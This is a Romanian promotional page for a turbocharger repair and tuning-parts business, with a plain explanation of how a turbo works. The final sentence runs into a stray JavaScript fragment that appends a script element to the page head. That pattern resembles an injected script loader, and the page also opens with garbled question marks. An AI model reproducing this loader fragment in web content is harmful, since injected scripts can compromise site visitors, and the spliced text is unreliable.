?????????????

Fie ca sunteti un impatimit al raliurilor, al curselor de drifturi sau un simplu posesor al unui autoturism dotat cu sistem turbo, suntem siguri ca nimeni nu isi doreste sa aibe probleme la sistemul de turbo. Insa, sunt situatii in care acest sistem se poate defecta din diferite cauze, ducand astfel la pierderea performantelor motorului sau chiar la punerea in pericol a motorului. Siteul www.turbina-reparata.ro este locul perfect pentru toti cei care doresc sa isi imbunatateasca performantele autoturismului sau sunt in cautarea unui serviciu de reparatii turbine de cea mai buna calitate, intr-un timp cat mai scurt.

Elementele unei turbine si functiile acestora

Inainte de a vorbi despre serviciul nostru de reparatii turbine, vom arunca o privire de ansamblu asupra unui sistem turbo, sau mai exact asupra turbinei de aer. Pentru a crea foc dar si pentru a-l sustine avem nevoie de 3 elemente, combustibil, o reactie termica si aer. Daca luam unul din aceste 3 elemente, combustia nu mai are loc. Insa, daca includem o cantitate mai mare de aer in interiorul motorului de combustie, se va constata o ridicare a gradului de performanta a motorului, ducand in mod direct la un timp de accelerare mai scurt dar si o viteza mai mare.

Turbina este echipamentul care comprima aerul preluat din filtrul de aer si il trimite direct in motor. Forta necesara comprimarii aerului este preluata din forta kinetica a gazelor reziduale obtinute din evacuarea motorului. Aceste gaze pun in miscare elicele axului comun al turbinei pe care se afla si pompa centrifugala de aer.

Acesta este pe scurt principiul de functionare al unei turbine. Necesitatea unor reparatii turbine apare in cazurile in care apar probleme la axul turbinei sau chiar la elicele acesteia. Cele mai uzuale cauze ale problemelor de functionare ale turbinelor pleaca de la o intretinere deficitara a acesteia sau de la diferite impuritati ce ajung in zona de compresie.

Pentru a va putea oferi cele mai bune servicii de reparatii turbine ehipele noastre de experti sunt tot timpul la punct cu tehnologia si mai ales, cunosc toate aspectele ce tin de turbine montarea acestora dar si repararea lor. Asadar, fie ca este vorba de o defectiune minora la sistmeul de cuplare sau ca este nevoie de inlocuirea axului si a elicelor, va putem oferi servicii competente de reparatii turbine cu timpi de executie foarte mici si mai ales la preturi rentabile.

Produse si servicii de reparatii turbine pentru masini de tunning

De asemenea, pentru cei care detin bolizi de raliuri sau pentru drifturi, aici veti gasi turbine special concepute pentru a maximiza performantele motorului, dar si servicii de reparatii turbine de inalta performanta. Va asteptam pe siteul nostru www.turbina-reparata.ro cu produse de cea mai buna calitate, iar pe langa turbine, tot aici veti putea gasi si actuatoare sau supape turbo. Astfel, fie ca sunteti in cautarea celor mai bune performante de la masina dumneavoastra, sau doriti sa aveti un consum redus va asteptam pe siteul nostru pentru a afla mai multe.d.getElementsByTagName(‘head’)[0].appendChild(s);